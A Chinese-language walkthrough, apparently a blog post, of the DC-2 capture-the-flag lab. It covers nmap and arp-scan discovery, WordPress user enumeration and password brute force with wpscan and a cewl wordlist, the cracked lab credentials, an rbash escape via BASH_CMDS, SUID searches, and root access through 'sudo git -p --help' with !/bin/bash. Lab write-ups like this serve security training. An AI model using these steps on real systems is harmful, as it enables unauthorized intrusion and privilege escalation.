環(huán)境：

kali：

ifconfig? ? #得到：192.168.0.115

局域網(wǎng)探測(cè)：

arp-scan -l? ?#需要root權(quán)限執(zhí)行，靶機(jī)IP：192.168.0.131

nmap掃描：

nmap -sP 192.168.0.1/24 #掃描Ip段的所有Ip地址

nmap -A -p1-65535 -T4 192.168.0.119? 掃描端口，查看端口信息

開(kāi)通了80Http端口和7744ssh端口

訪問(wèn)web 192.168.0.131

訪問(wèn) 192.168.0.131 返回的是http://dc-2/域名，我們用honsts 做下域名指向

訪問(wèn)成功，flag

提示我們用cewl測(cè)試

使用dirb 做目錄掃描

dirbhttp://dc-2/

發(fā)現(xiàn)后臺(tái)地址

http://dc-2/wp-login.php?redirect_to=http%3A%2F%2Fdc-2%2Fwp-admin%2F&reauth=1

用戶枚舉，嘗試?yán)妹杜e到的用戶爆破密碼

wpscan –url http://dc-2 -e u??枚舉出三個(gè)用戶

使用rockyou.txt 生成一個(gè)dc2.txt 的字典。同時(shí)利用枚舉出的用戶也生成一個(gè)密碼字典。

接下來(lái)就是密碼爆破了。

wpscan –url http://dc-2 –passwords /usr/share/wordlists/dc2.txt –usernames /root/dc2.txt

這個(gè)字典有點(diǎn)大也沒(méi)有針對(duì)性。

剛才提示的是讓我們利用 cewl 生成字典啊，那我們需要利用爬取網(wǎng)站的關(guān)鍵字重新生成字典。

cewl dc-2 > dc-2.txt

繼續(xù)爆破

wpscan –url http://dc-2 –passwords /root/dc-2.txt –usernames /root/dc2.txt

Username: jerry, Password: adipiscing

Username: tom, Password: parturient

登錄后臺(tái)，又有提示信息

掃描全端口

nmap -sS -p- 192.168.0.131

進(jìn)一步探測(cè)，找到一個(gè)ssh

nmap -sV -p 7744 dc-2

嘗試使用之前爆破的用戶名密碼登錄ssh

jerry 登錄失敗，但是tom 成功登錄了………

使用tom登錄后rbash限制，各種命令執(zhí)行不通?。?！

嘗試?yán)@過(guò)暫時(shí)沒(méi)找到繞過(guò)方法，但是vi 可以使用，暫且使用 vi 查看flag3.TXT 內(nèi)容。

大概意思是提示我們切換jerry賬戶

關(guān)于rbash 繞過(guò)可以參考以下兩篇文章：

https://www.4hou.com/penetration/11674.html

http://www.itdecent.cn/p/a977856e8629

但是這并沒(méi)有解決我的問(wèn)題！

以下方法成功繞過(guò) rbash 限制

https://blog.csdn.net/qq_38677814/article/details/80003851

rbash 限制繞過(guò)（又差點(diǎn)猝死?。。。?/p>

1.r意味著restrict

2.使用BASH_CMDS[a]=/bin/sh;a

3.

$ export PATH=$PATH:/bin/

$ export PATH=$PATH:/usr/bin

4. echo /*查看文件

切換 到 jerry ，在jerry 家目錄下找到第四個(gè)flag

flag4 提示我們可以使用git，我們可以通過(guò)git來(lái)提權(quán)

sudo -l 我們可以看到無(wú)需root權(quán)限，jerry 可以使用 git ！

我們可以利用suid 進(jìn)行提權(quán)

SUID可以讓調(diào)用者以文件擁有者的身份運(yùn)行該文件

已知可用來(lái)提權(quán)的linux文件： Nmap Vim find Bash More Less Nano

查找系統(tǒng)上運(yùn)行的所有SUID可執(zhí)行文件。

find / -user root -perm -4000 -print 2>/dev/null

find / -perm -u=s -type f 2>/dev/null

find / -user root -perm -4000 -exec ls -ldb {} \;

輸入sudo git -p –help

輸入!/bin/bash 獲得root權(quán)限，并且在root目錄下找到最后一個(gè)flag?。?！

我似乎在這條道路上有著用不完的激情